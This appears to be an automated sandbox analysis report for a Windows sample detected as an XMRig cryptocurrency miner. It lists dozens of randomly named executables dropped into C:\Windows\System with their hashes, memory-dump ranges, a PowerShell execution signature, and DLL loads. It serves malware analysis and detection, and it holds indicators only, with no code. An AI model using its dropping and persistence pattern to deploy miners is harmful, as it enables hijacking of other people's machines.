SHA512 620b3cf59abd3d6d74c32af26891a792a64433acb663d3756ca2f4ff6e8c951b537ceb195a0e1c445858b309eb569b3077a1fcbb33420092e7227cc3a20fd119

C:\Windows\System\etHMQHe.exe

MD5 d11c8d4d7dec456da65677c60ffb8b2d
SHA1 523d557d1b2d2623fa00d678952343df02770a87
SHA256 cffe0540a47a84ada0c5b01340b46da429b3aa8f01656f9264388ac66bae8641
SHA512 c6c0e3ba7a9fb67065ee0cdaac4f410a8966a1c87ef5e4fc6b15290acb0ed11c7cd539433c86eb7d10d7f6df19aca47887533235c89df910e94cbc5e39e4f402

C:\Windows\System\TjMFNtQ.exe

MD5 ee0577a5eabb4fde446a60b6a7cbc70a
SHA1 3b1eeda121da41f213cf333410c99c5983f59541
SHA256 537febb9a65ad0741ae4e3c9a0c7a79cc76d43e8f80fb2793283aa46e9f3e2b1
SHA512 dff62d061b8ccdca1d5506d6500e7159358bfc9e462e1911cbcc5f7604f3deb5248546c59be6c175e93d91458d7b15bbbbd0ada819e5cf73368c7e323e029a3e

C:\Windows\System\wlywQfv.exe

MD5 0755694161c2ac62b15d6b5d4753d470
SHA1 d48de40a032246492f7b41cc2425ffb4ae727048
SHA256 ce20c7c7dca7c1fcd8be58cd200661a4376a51eac05ffe54efe5072db4e802e5
SHA512 4026e5f34b5c34adb30b21457bc8a5d9105b0730fbe7290073c5e0e917dcd59a3b57f2add5c50098be036c331987f3cc53dfe1f784b60a340aee41ccdd8f5ffc

memory/3088-203-0x00007FF76C7B0000-0x00007FF76CBA2000-memory.dmp

memory/2384-224-0x00007FF6F61F0000-0x00007FF6F65E2000-memory.dmp

memory/4880-254-0x00007FF688BA0000-0x00007FF688F92000-memory.dmp

memory/3996-357-0x00007FF7E5E00000-0x00007FF7E61F2000-memory.dmp

memory/4660-446-0x00007FF6D6290000-0x00007FF6D6682000-memory.dmp

memory/4792-469-0x00007FF7C42E0000-0x00007FF7C46D2000-memory.dmp

memory/4716-517-0x00007FF753230000-0x00007FF753622000-memory.dmp

memory/1944-557-0x00007FF7134D0000-0x00007FF7138C2000-memory.dmp

memory/564-558-0x00007FF60F910000-0x00007FF60FD02000-memory.dmp

memory/4388-555-0x00007FF7574A0000-0x00007FF757892000-memory.dmp

memory/4200-468-0x00007FF6BB240000-0x00007FF6BB632000-memory.dmp

memory/4520-721-0x000002A977860000-0x000002A978006000-memory.dmp

memory/3324-435-0x00007FF6F38F0000-0x00007FF6F3CE2000-memory.dmp

memory/3316-434-0x00007FF68D7A0000-0x00007FF68DB92000-memory.dmp

memory/1784-403-0x00007FF736860000-0x00007FF736C52000-memory.dmp

memory/3720-358-0x00007FF7A4F60000-0x00007FF7A5352000-memory.dmp

memory/4344-335-0x00007FF69E730000-0x00007FF69EB22000-memory.dmp

memory/1192-334-0x00007FF720F60000-0x00007FF721352000-memory.dmp

memory/1432-321-0x00007FF6D8490000-0x00007FF6D8882000-memory.dmp

memory/1452-316-0x00007FF7541E0000-0x00007FF7545D2000-memory.dmp

memory/2200-216-0x00007FF7943B0000-0x00007FF7947A2000-memory.dmp

C:\Windows\System\uSSfEKc.exe

MD5 d3d8e19e4f70331be53ec671eaa5063e
SHA1 46fcceedb291982f9f41a3a9eef430dba3809527
SHA256 63e5d9b6468e060969e01b1e942522e16c7e74290d342bede91b4fcb26e5441f
SHA512 18d29638bc18c2bc296bcaebf2d3c4ca7fcef82027dccaf159cfb72f92bedcc0f5b3390ddcf16ec15c33667ebaba10a8a8150e6987c0911db458c50e00761fdb

C:\Windows\System\GTfcnns.exe

MD5 b7f532e8016fd602c2533b9d367cba84
SHA1 fb8579e58f03e4d7b94c864a3a3f4a73494ad68f
SHA256 7e634f7732c8a78bf8525b206caa8ed1f2a8e3369f790190d4170316ef652815
SHA512 b4c6ad67a89743fdbfd5d878f5789a8acec59af8ccc89c72b25fa02c877fb7331dcb9a0bb9f34f1a7715ae65d489130d3234ce47a0fc9cc12b4c618c16c127e4

C:\Windows\System\UHCwsUg.exe

MD5 cb2fd931142f807d8d91af36753ec032
SHA1 a9432af567ce4fac5264af7eb357dd24c3b6c57f
SHA256 965d05334c519d3af325587c3576fb24125da78f9d0ec84a87445c0ef6970e5b
SHA512 e7ed1f2d0558266ba1683c65391af474f57d775fbf94e783896d975a811350d318deca1127a941a70a8e174a06418250ea14bdfdb7001416cb6f133044676b60

C:\Windows\System\JyTPThp.exe

MD5 0b30fce33fd3658a73db38bc4d746a41
SHA1 d32ffc4b3206767153d72a524d792749bd367b52
SHA256 14cb0c31edde49aee263f030846a2d2cfa207b7049cb758552dd33a9ab10ad4f
SHA512 7fd0e317d2f1cd9b4746bbc3d779c4b039259120cae1cbf07306967f8f2ac78495ed5f61ecbcdc26d85bd49bf86287b1acedba8c0887883f34d67e8e6b14158f

C:\Windows\System\vJcMENp.exe

MD5 0cf07830b1a00d4412ff2829e0c598ff
SHA1 03dce3d839b4c5636a1025e7f293b7ee71cec56a
SHA256 5eb2aed9a6386909281f70026b258f8f4e3968df09f4822853f0b37fd78fe004
SHA512 4eba5c87a4ea9014130fdd177d2628867e7e479bb3ef809615752336f45bd498f9b18f164018acfb41bad229642d33e5ff8d36920dcd74991216278c840e8745

C:\Windows\System\MPktnKL.exe

MD5 8a6830bcd6a3cd9432cdd1f12c9519a6
SHA1 170ca723fe67748146c4409c1c9f5aa45158af8c
SHA256 b4913c6b7fbebb98f116aa0428cffb9f726482c848d6d912ef799ab575bf85c6
SHA512 4c232bc1fce4fb97f4c4e7fb973f2b3398e3df85f8a7759d569cfae5e03f94c0ed13c5358afd7699999047e513fae909873bad68100b700d3e439c7158986f31

C:\Windows\System\CBkSwBb.exe

MD5 6011b48db2e704b9832fb080694026df
SHA1 e098895a40041f4ab0ea01df8107f67818506814
SHA256 1a783eef1eded4bd6f87f07094dc79686efc95770a3b8681d7e23c7950e5250c
SHA512 0ceb6cb80ec46952e0f3c9c5b450eb3493d8387e3b0eee85d20fc92b27ffd4f3ab3451b6fb86ccaf07a8c1e630a9b151ca4cda2b76cdb830c5b935043391ba9b

C:\Windows\System\YpUfwYV.exe

MD5 fb95cf6a7548bcd873f9736ccf14be9a
SHA1 468eba0ce1977428e8dcf6d9990f81f7b337e1c0
SHA256 52a9491434600769380eb4bcce82b7164c2aecc551932a8254078479c2e28935
SHA512 a0a4ce1d35201f25b85f56251a5716615ca110a5a9b558821efbf27d2c41993d1a30bc7dff5ec7fb7b5de1a8d5566ca65b32341d8b7c2463a735dbcac7f3dc90

C:\Windows\System\hmWwugt.exe

MD5 37cbe594dbcf12e244f8e1dde0b188e7
SHA1 9227ec1795d96affc9d94d25c40f8223ab36ca83
SHA256 d2868b26b7b0a63b3c80cf56febdcce22bdd588cec3ea7c88749bf8dcccfa8de
SHA512 f4803c519ed07fe51dc71893aa9c1399ef3b7a62c6911b22dece2ba12ce63480dd6d5f30f349cd81353df1bd9d8317b1f8a76fd5441900e6e62de6fa3cfbbf44

C:\Windows\System\dZKOjjO.exe

MD5 959d1db336cd926f32c489227de2ad90
SHA1 425e5f2a6b0ffaee9a90a6c6e2477b048d0935b1
SHA256 ba737d4b68e57388ee971cd5cd158f16ba5f4ecf35eb93dcf28d2e93cc979b4c
SHA512 0ff8d8957fae043db9c45d53400ddcac0d232d53c85c7e505c8b8f365705d07568b3290d7d451fb09d8484d92b030fe72bb0c2458b7a3099f3e06a3bfb43ea7d

C:\Windows\System\ayYTYGq.exe

MD5 cdfc3f805158d5387195d339adc3e278
SHA1 21ad5da6af3101044e0e665d39146dd38c51da55
SHA256 51e126fa403ff014a70401a7ce1dc007caab92f5524c2858cd9e7bb06d82f08c
SHA512 8adfc429dabcb91655fbb39c0b4cbf9b6b9c4e4eab9330b43c64bd07591af8aaa601a6a34326d6bc52dae86b09b7388fc83407436d3b93802f356d60a3df6a02

C:\Windows\System\GgfoxTr.exe

MD5 3ee6adcf5ded65eb8aab3c32d8bdea27
SHA1 8a352be7c080312becdd7a2f627b5d5ea082e9b9
SHA256 978a727e99a3cae4dd2ee24c63190bfd151738186b324da5f43d2ab5739197f4
SHA512 e0937509883e52a0b75483ee42ea499f63d0f1bf921f2bdd03fe02df43b155a83e5f6e44b74faee7d73352def57665e2a84f4f431a6fb1022197b77c624d174b

C:\Windows\System\nESehyC.exe

MD5 532a3ee5b5924b7688d568e4ce005c11
SHA1 b82718ae5623fe81d74a62a1156c88b7ce4e08d4
SHA256 9d04960f7c8f086ccbf49b5e2b692006728dd82f21cbdd5210869fe3feb9400b
SHA512 028daa8dc4a05c1e284a8c7b15093f7c8fce3ea3529d562b855b243a330b0ab693ced8693c7e936609c8f78b506acb3ff76cbb382728611b6973a4496e6f4c31

C:\Windows\System\GEDVfiV.exe

MD5 572b007d0b16d23b4c9d4d21aadf5d1b
SHA1 2ba460d08ba54cbaefe4a6a37306821d15154d59
SHA256 f2f8593a9895f57b9a2b5ca690b6f615c409b786b09238a4146dc80b39cd769b
SHA512 c2c5043813bff5c7ba26fad1669f816cb623817174737f8e83effdd48f0f4d26a3f023875267ffed77ed35a4ba8d842129a5edd7dc548041ea73884ec516d277

memory/4520-144-0x000002A976C50000-0x000002A976C72000-memory.dmp

C:\Windows\System\JiMyCQR.exe

MD5 d1b23cc908c3c3660e23b22c6b2e9340
SHA1 f91288ffe80acff9c35029fe3b2aed8be90fbd4e
SHA256 ca18c00cc3d5d1d38fb548bbb877b14b0d14c6041c52e149f157fdb573c223e0
SHA512 5d4fe2663b4bac3e0562fbd4a3243781bbe1bd313b460438c5346093da367fc2631c929b587b24c4aee009c92224392118812ebc2bdc8790943713045a4a3592

C:\Windows\System\RPbpAHo.exe

MD5 47ed9ebb32f3d32954d9e63b021d83ca
SHA1 e5e4d70e20b2517427df03cd339f88cffc525eff
SHA256 4181c6c180e3e79584fab0445bacd5964023621b775c943f9f5de627ecf69550
SHA512 4ad97d020f79b7d113b41d0bb120ee2e94f2aa52943b5885c8a62211b2194d9bd44335fd1c1211232bb37026b7f2cdef97a31d0aa1608edd8c57e0f839a2d2c0

C:\Windows\System\OlHuPyU.exe

MD5 794e17e82b67dc10501da62552c01298
SHA1 54faae69026a2cda0458a53af94a908b23a2ff15
SHA256 1d8464ff846ab1d90dbc12cb9d3dc1b4c1045b1f0e78e761dfecf3976fd6fda0
SHA512 a6ef8c5971e27cfbe4885755b5b213ac770ed4caef4a67b7e55b82b2b46b1397b55a826116474a52e2da3aca5e9060d40de5065dfc30df02aaa67dba146cbeb5

C:\Windows\System\cjxDRxy.exe

MD5 e6445c011162d344bd15243906a940e1
SHA1 3fbbf29b8c98ed17ab1384988342f7bc529e8813
SHA256 7aa0e66edef7968969a396beda83f08703a9058a85d6da2db6af513f81379ecf
SHA512 466604bf2dda0097318210628a7decf267074c7dca4e5594b9bbd881a4772baa7a6b4a5dc6923df93386f7490faf183e57e508f08f84793bfad2cf9cb7d46ba1

C:\Windows\System\byeZGtM.exe

MD5 79152d4702c2360bb8b97034f31d1a37
SHA1 ee41cd303d0e74045fcaa0260c85b293c59c8695
SHA256 c62102da71cda2a4b82b6c0fe1c9bd828cded043481518209a1079516448ce85
SHA512 e15755a754a65d9a77d8c8b97a38db6435e8301a9a59673b86786d8569219941387f3a276d6d8b06364eebf11a2a1ee2402321873fd8ea52169a82d09e255ede

C:\Windows\System\rkHvnyk.exe

MD5 5196eb1678a1892830cef8bd9618474a
SHA1 fc05a50938cc2699d86eba76279f997a289ee7cb
SHA256 bbb028d28e0db5ed407548795120f2e346122bcf6f44ec8bb950f7a691a43073
SHA512 578b9d138b8abc7fe1e70ca9f6e0266876c530b8d2b38bbfd4b7681de809771b9d61dd998fe32a4c4242d501ce9edffc100aa85aa2962a62a2688fb4cfe96450

C:\Windows\System\doPYruV.exe

MD5 11651bbd6a39ae5378376601774f87a6
SHA1 31e88c18054de65a09f55eabfde262e4fb860174
SHA256 4577fffcfe1de989cf4fe3c2777cf949de50bc3e459b6cc19500439411df4d60
SHA512 2debf8a8a4ecc806bf1829383f858be1f62acdfb353627d6e23044b242b75df85990fc6fcd088bea159b6495ad7b7845b907e2cb183cd2af09f1fce5c15f78ab

memory/4420-171-0x00007FF7F51C0000-0x00007FF7F55B2000-memory.dmp

C:\Windows\System\Jrpfcwr.exe

MD5 39a8d203f31deeeb1f981be5e55d75b6
SHA1 608303531d01b0ed89dc14ba180e1b56748070c8
SHA256 e77b4f74da8a15bda6c9ec3b7e28d2ed047a408b8429183da2740bd20df96f47
SHA512 ce9f3cb7de9c399fd5b98c97beafbff3c4e056a0aec5f421fb09520f42a44feab6fde59650ef00785d33ac7950161c0e87c1380da76e6d1d50478bb15aa1575e

C:\Windows\System\GfvluYu.exe

MD5 62405eb54d0230ab39e8e50b667c8b7e
SHA1 b05b567bfb1a2a849bb55cf333c4d6e367521e79
SHA256 c931785b5b6ae75cd92ab6c63dd8de1c62d5f9dcbe1d585c28e29c790ad2584d
SHA512 bacc8fb690116afaecac0eaf1a31b3fb043d11aaa3044d93c9b801c944d01d5f3426dc9488455542f7ce36f13a287be6d2546e8771983226896b3e07187497c5

C:\Windows\System\leiGMuT.exe

MD5 0b5829e79b0414c51905444712d1c3c2
SHA1 a625da7b240b2306a4907c11341e56df1fda7fea
SHA256 c9639fd57a04b6a72ce22bfe3f7be3669bf60faea12ee97099af47c4dd54c060
SHA512 7ca978d03c669a4bb32499c0279e3d4685d807ebe677ffd9ff55eac646de385e28988ace1c524e5e49a6703fc0704e472aa5dca65abb1a6b02c7995d5ee96509

C:\Windows\System\lQfWRnx.exe

MD5 87718eb6456f46c56e4dd8f66a97125c
SHA1 258614e8e0d6315f3d8e61042ecfda5510e86483
SHA256 c2e086b9428c601a4a48556cb0878fbcaccd87a7dedd0d66f5120a9566b3a73f
SHA512 336d9d531d2bc5d63b425122cd9f3cf872cfe14c63f02cfc0b7730634baccbffa84a1297d277aa6ee469fe2b07cc845a6c4cda49c4c1074a0e9a64f7578a158a

memory/2316-122-0x00007FF7AED20000-0x00007FF7AF112000-memory.dmp

C:\Windows\System\tkQTMyN.exe

MD5 f09c15c2dd2e7c160246daafc430aec0
SHA1 2b2cf56145a31fdc92350d81cc262b06e62334e0
SHA256 ae2e537b96df2a64648076f8ad0190af35c0335df16c7e3c6d2c77c898783446
SHA512 044c81cff2d0d205c34f8a75a73b2d98c6c5773bb3245678c64571ea61a4b98ec5364074d108adf2a088cca9bb4862b23db8aba085c38867a2b58242823e6bce

C:\Windows\System\xkCSZOf.exe

MD5 c1480c82b58394e5485eb8b47ef3fb14
SHA1 e0ca2b56e107a32a5961d00c76268405094b4802
SHA256 7d41bc4f51979de4be7ec00d9fddb07cc4b42fdde825b38f6ad28d9c1fef6daa
SHA512 c0f988cafbeb986b6d0feccdb12defd627b2ebef527926e6844b75a93a844974d80057250857e45bcd40730d12af46194de519853f587727485391aec2e8b156

C:\Windows\System\yZyyZDP.exe

MD5 710ee72158dbd9ecb246249f9bf0ab80
SHA1 69770696a6a1fad472d415c40ce0fa13af548f2f
SHA256 3a9c3c127434355b0ff12879f0f2b07cd86331986ba5ee8dde1e54455865b3c3
SHA512 68c557ae9499959effc75d234ea75ac8ba1a67df1c047bece343b928f515179deeecd6343452ee79d47fa71edd02bee4a1f28a4d30c490a84f441ebc1380a1f3

C:\Windows\System\ejgmYJX.exe

MD5 e2512b21822deafd1ae4561343ae277e
SHA1 c5ee7da6dc519c8585dcee6d1e105d22f53b661c
SHA256 0157c30a43ef8685cd24db72cb7e27754a57578185a85e0ddcc220fafab75112
SHA512 beef82fd46a7b30bbe9cfe9caf8e003caabc5e43117315b2ca6b4c919169210a30ebb14f01c2cee3c87749a61d113d80b6da68088346c954aa9e2c3d2ba521c4

memory/1436-79-0x00007FF6A1F40000-0x00007FF6A2332000-memory.dmp

memory/4828-72-0x00007FF7A6980000-0x00007FF7A6D72000-memory.dmp

C:\Windows\System\oiisWpg.exe

MD5 02f0d875b4612b70ce330e9a82cee4af
SHA1 b0d34078726bdad2cbc07fa46bd9ef23bd7e09b3
SHA256 81d319984feb35cbd2a0a88b220cbb5d65ed93f57fca9e5d6ef0f0f50e61fac6
SHA512 912b65392169f937631d1cb8fb5226c2e43a12377714394ac0360cbb8e46a5e0b2236359b55911e1a53ea08cbd54cafb3f72f62b985be5fbaa6eb854b75a3173

C:\Windows\System\ceKlYdH.exe

MD5 37ccc5c959e5b9e39e9be05c22b19105
SHA1 7879c7a8dfe56c5ce6a89668120efb3f9407e328
SHA256 1df1c625752078ca9c5d3af6b81b7ab02128d054e696bf60ae289c3f72c5127f
SHA512 aa6a9efc5c98c166772974810a50b6faa8a4aafd1db080f591e8f6a4f2c97863b80f9c09c3e397bc34aaf822c108e234f2813da00e83b45b80ad7058c65789f5

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubii44f1.2ew.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\gKHEctz.exe

MD5 22f3c8a344a2512b893308ab2fa77621
SHA1 5a05ca0e3c04fdbcc449852bb51a446e6db6601a
SHA256 ec07a72a54a3657ede7153b685dbf5198710ad118f733f1fe8f5258a8bd93359
SHA512 653c575069a85677f96ffccb57f95bcc7211becd8bec01292c9e74a2e01bc898498fd5980868112f3b0aa45fd515c23b0dd7d64655576a2c3f311935dc80d123

memory/4520-32-0x00007FF83DD70000-0x00007FF83E831000-memory.dmp

C:\Windows\System\Cuksxpu.exe

MD5 2adac273ce248e8d242a4b12f749bb46
SHA1 300bd2c60c669d978305195f11eaf26c73d9e457
SHA256 5a695799bf8f73300a4f9c4a59fd25b209a2457abf1051a262d540e520557456
SHA512 011941b215532355e8e4d21af78180da68d2fe04927118ebe818ec14ec4bfb6a7a2d9aaa01fdfd0cd2c6dc84968b5f642ccf10cc92c29aa0e1d06bcf6f120232

memory/4828-4849-0x00007FF7A6980000-0x00007FF7A6D72000-memory.dmp

memory/2316-4851-0x00007FF7AED20000-0x00007FF7AF112000-memory.dmp

memory/4716-4861-0x00007FF753230000-0x00007FF753622000-memory.dmp

memory/4388-4858-0x00007FF7574A0000-0x00007FF757892000-memory.dmp

memory/2200-4870-0x00007FF7943B0000-0x00007FF7947A2000-memory.dmp

memory/2384-4879-0x00007FF6F61F0000-0x00007FF6F65E2000-memory.dmp

memory/3324-4887-0x00007FF6F38F0000-0x00007FF6F3CE2000-memory.dmp

memory/4880-4881-0x00007FF688BA0000-0x00007FF688F92000-memory.dmp

memory/4420-4873-0x00007FF7F51C0000-0x00007FF7F55B2000-memory.dmp

memory/3088-4869-0x00007FF76C7B0000-0x00007FF76CBA2000-memory.dmp

memory/4200-4935-0x00007FF6BB240000-0x00007FF6BB632000-memory.dmp

memory/3996-4926-0x00007FF7E5E00000-0x00007FF7E61F2000-memory.dmp

memory/1784-4924-0x00007FF736860000-0x00007FF736C52000-memory.dmp

memory/3720-4920-0x00007FF7A4F60000-0x00007FF7A5352000-memory.dmp

memory/1944-4919-0x00007FF7134D0000-0x00007FF7138C2000-memory.dmp

memory/3316-4914-0x00007FF68D7A0000-0x00007FF68DB92000-memory.dmp

memory/564-4956-0x00007FF60F910000-0x00007FF60FD02000-memory.dmp

memory/4344-4909-0x00007FF69E730000-0x00007FF69EB22000-memory.dmp

memory/1192-4899-0x00007FF720F60000-0x00007FF721352000-memory.dmp

memory/1452-4912-0x00007FF7541E0000-0x00007FF7545D2000-memory.dmp

memory/4660-4902-0x00007FF6D6290000-0x00007FF6D6682000-memory.dmp

memory/1432-4894-0x00007FF6D8490000-0x00007FF6D8882000-memory.dmp

memory/3428-5678-0x00007FF724820000-0x00007FF724C12000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 02:52

Reported

2024-05-27 02:54

Platform

win7-20240508-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\TuNNhTj.exe N/A
N/A N/A C:\Windows\System\amSOOrS.exe N/A
N/A N/A C:\Windows\System\gPLqLwT.exe N/A
N/A N/A C:\Windows\System\PPGBUgh.exe N/A
N/A N/A C:\Windows\System\pyEWYni.exe N/A
N/A N/A C:\Windows\System\EZDMQMm.exe N/A
N/A N/A C:\Windows\System\mDeSSIQ.exe N/A
N/A N/A C:\Windows\System\ydiDNmI.exe N/A
N/A N/A C:\Windows\System\qQEsBLy.exe N/A
N/A N/A C:\Windows\System\Ceynmlz.exe N/A
N/A N/A C:\Windows\System\SHotOeT.exe N/A
N/A N/A C:\Windows\System\aJuctSV.exe N/A
N/A N/A C:\Windows\System\oSNVSWG.exe N/A
N/A N/A C:\Windows\System\pnjwqQH.exe N/A
N/A N/A C:\Windows\System\ZIWBJpp.exe N/A
N/A N/A C:\Windows\System\VRoWanF.exe N/A
N/A N/A C:\Windows\System\tQQzRCk.exe N/A
N/A N/A C:\Windows\System\ZQrfFIr.exe N/A
N/A N/A C:\Windows\System\uZjSant.exe N/A
N/A N/A C:\Windows\System\dBOWwHu.exe N/A
N/A N/A C:\Windows\System\RzpWlBM.exe N/A
N/A N/A C:\Windows\System\PcSMTSS.exe N/A
N/A N/A C:\Windows\System\lDdtoDj.exe N/A
N/A N/A C:\Windows\System\pXPHijv.exe N/A
N/A N/A C:\Windows\System\ZzWTNcn.exe N/A
N/A N/A C:\Windows\System\yLGtoBO.exe N/A
N/A N/A C:\Windows\System\AqVJeXZ.exe N/A
N/A N/A C:\Windows\System\MILdLMy.exe N/A
N/A N/A C:\Windows\System\EYfkZcB.exe N/A
N/A N/A C:\Windows\System\xbZxDbH.exe N/A
N/A N/A C:\Windows\System\LOCSDmR.exe N/A
N/A N/A C:\Windows\System\ZKbOoho.exe N/A
N/A N/A C:\Windows\System\efnexGm.exe N/A
N/A N/A C:\Windows\System\QcZveAf.exe N/A
N/A N/A C:\Windows\System\VRKrGOd.exe N/A
N/A N/A C:\Windows\System\GXgYxrA.exe N/A
N/A N/A C:\Windows\System\JLdJMMV.exe N/A
N/A N/A C:\Windows\System\gcPAnWF.exe N/A
N/A N/A C:\Windows\System\YmrBUjQ.exe N/A
N/A N/A C:\Windows\System\BDJJViI.exe N/A
N/A N/A C:\Windows\System\NWyyBVb.exe N/A
N/A N/A C:\Windows\System\QELzOJt.exe N/A
N/A N/A C:\Windows\System\cdKWsES.exe N/A
N/A N/A C:\Windows\System\dpGGCXz.exe N/A
N/A N/A C:\Windows\System\VeytcLn.exe N/A
N/A N/A C:\Windows\System\UXEZphK.exe N/A
N/A N/A C:\Windows\System\ZxYWWek.exe N/A
N/A N/A C:\Windows\System\cIwGNMo.exe N/A
N/A N/A C:\Windows\System\fqZQOAN.exe N/A
N/A N/A C:\Windows\System\XgusBrr.exe N/A
N/A N/A C:\Windows\System\iPzhnmj.exe N/A
N/A N/A C:\Windows\System\drWxaYW.exe N/A
N/A N/A C:\Windows\System\VpNLKbg.exe N/A
N/A N/A C:\Windows\System\hsVYtyo.exe N/A
N/A N/A C:\Windows\System\UxsGwxp.exe N/A
N/A N/A C:\Windows\System\epoVCHR.exe N/A
N/A N/A C:\Windows\System\TrkGUnn.exe N/A
N/A N/A C:\Windows\System\HCQGCim.exe N/A
N/A N/A C:\Windows\System\RdFQvoT.exe N/A
N/A N/A C:\Windows\System\kBQaXEq.exe N/A
N/A N/A C:\Windows\System\empLKGJ.exe N/A
N/A N/A C:\Windows\System\POeSLHw.exe N/A
N/A N/A C:\Windows\System\ElOkFBT.exe N/A
N/A N/A C:\Windows\System\WbzGRGK.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\77acc2426b69a21392b13fc0cfe697d2_JaffaCakes118.exe N/A
